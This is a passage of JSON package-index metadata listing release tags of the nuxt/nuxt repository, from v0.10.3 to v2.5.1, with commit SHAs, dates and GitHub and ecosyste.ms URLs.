5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url"